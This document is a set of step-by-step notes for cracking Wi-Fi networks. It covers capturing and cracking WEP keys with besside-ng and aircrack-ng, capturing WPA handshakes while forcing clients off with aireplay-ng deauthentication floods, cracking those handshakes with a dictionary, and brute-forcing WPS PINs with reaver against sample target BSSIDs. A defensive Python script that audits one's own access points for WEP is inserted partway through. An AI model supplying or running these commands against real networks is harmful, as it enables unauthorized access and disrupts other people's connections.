0. Prepare
0.1. Installing Aircrack-ng
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ng
0.2. To find the name of your wireless network adapter
ip a
ifconfig
0.3. Put your attack card into monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
1. Locate Nearby WEP Networks
sudo airodump-ng wlan0mon --encrypt WEP
2. Attack a Discovered WEP Wi-Fi Network
Besside-ng will log all of the data it collects in a .cap file.
So, if your network card was wlan0mon, the BSSID of your target network was 7C:CA:ED:A4:9B:EE, and the target network was on channel 3, your command would look like the following.
besside-ng -b BSSIDofTargetNetwork -c ChannelTargetIsOn NameOfInterfaceCard
besside-ng -b 7C:CA:ED:A4:9B:EE -c 11 wlan0mon
3. Flood the Network & Extract the WEP Key
aircrack-ng ./wep.cap
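The scan in step 1 is also useful for auditing your own sites: the sketch below reads an airodump-ng CSV capture and reports which of your own access points still advertise WEP so they can be migrated. It is an added example, not part of the original notes; the sample data and the owned-BSSID list are constructed, and the column layout is assumed to match airodump-ng's CSV output.

```python
import csv
import io

# Constructed sample modeled on airodump-ng's CSV output: an access-point
# table, a blank line, then a station table. All values are invented.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  3,  54, WEP , WEP,   , -40,  120,  0,   0.  0.  0.  0,   9, warehouse,
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -50,  300,  0,   0.  0.  0.  0,   6, office,
AA:BB:CC:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,   , -60,   80,  0,   0.  0.  0.  0,  12, lab, floor 2,
DD:EE:FF:00:00:09, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP , WEP,   , -80,   15,  0,   0.  0.  0.  0,   9, neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -45, 42, AA:BB:CC:00:00:01,
"""

# Hypothetical inventory of access points the auditor is responsible for.
OWNED = ["aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"]

def parse_access_points(text):
    """Return the AP table of the capture as a list of dicts keyed by column name."""
    header, aps = None, []
    for fields in csv.reader(io.StringIO(text)):
        if header is None:                      # skip anything before the AP header
            if fields and fields[0].strip() == "BSSID":
                header = [h.strip() for h in fields]
            continue
        if not fields or not fields[0].strip():
            continue                            # blank separator line
        if fields[0].strip() == "Station MAC":
            break                               # station table: not needed here
        n = len(header)
        if len(fields) < n:
            continue                            # truncated row
        # ESSIDs are unquoted and may contain commas; rejoin the spill-over.
        essid = ",".join(fields[n - 2:-1]).strip()
        values = [f.strip() for f in fields[:n - 2]] + [essid, fields[-1].strip()]
        aps.append(dict(zip(header, values)))
    return aps

def audit_wep(text, owned_bssids):
    """List (BSSID, ESSID, channel) for owned APs whose Privacy column includes WEP."""
    owned = {b.upper() for b in owned_bssids}
    return [(ap["BSSID"], ap["ESSID"], ap["channel"])
            for ap in parse_access_points(text)
            if ap["BSSID"].upper() in owned and "WEP" in ap["Privacy"].upper().split()]

if __name__ == "__main__":
    for bssid, essid, channel in audit_wep(SAMPLE_CSV, OWNED):
        print(f"WEP still enabled: {bssid} ({essid!r}) on channel {channel}")
```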
Ref
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-hunting-down-cracking-wep-networks-0183712/
https://howtotechglitz.com/japan/%E6%96%B0%E3%81%97%E3%81%84pmkid%E3%83%8F%E3%83%83%E3%82%B7%E3%83%A5%E3%82%AD%E3%83%A3%E3%83%83%E3%83%81%E6%94%BB%E6%92%83%E3%81%A7wpa2%E3%83%91%E3%82%B9%E3%83%AF%E3%83%BC%E3%83%89%E3%82%92%E7%A0%B4/
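1. Capture the handshake
airmon-ng start wlan0 (put the card into monitor mode)
airmon-ng check kill (stop other processes that interfere)
airodump-ng mon0 (scan for nearby Wi-Fi networks)
airodump-ng --bssid TargetMAC -c TargetChannel -w crack mon0 (crack is a file name of your choice)
Then wait for the handshake packet.
2. Speed things up (flood attack)
aireplay-ng --deauth 10 -a TargetMAC -c LocalMAC mon0 (flood attack; 10 = 10 times)
3. Run the dictionary
aircrack-ng -w /tmp/WPADict.txt crack-01.cap (run the dictionary; the .cap file here is the captured handshake, and the file before it is the dictionary)
Or upload it to an online cracking service: http://www.china-paobao.com/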
WPS
1. Find wireless routers with WPS enabled
wash -i wlan0mon -C
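If nothing is listed, there are no WPS-enabled wireless routers nearby. Note the BSSID of the Wi-Fi network you want to crack.
2. Start cracking the password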
reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a
Wait 2-10 hours.
Finally, don't forget to take the wireless card out of monitor mode:
airmon-ng stop wlan0mon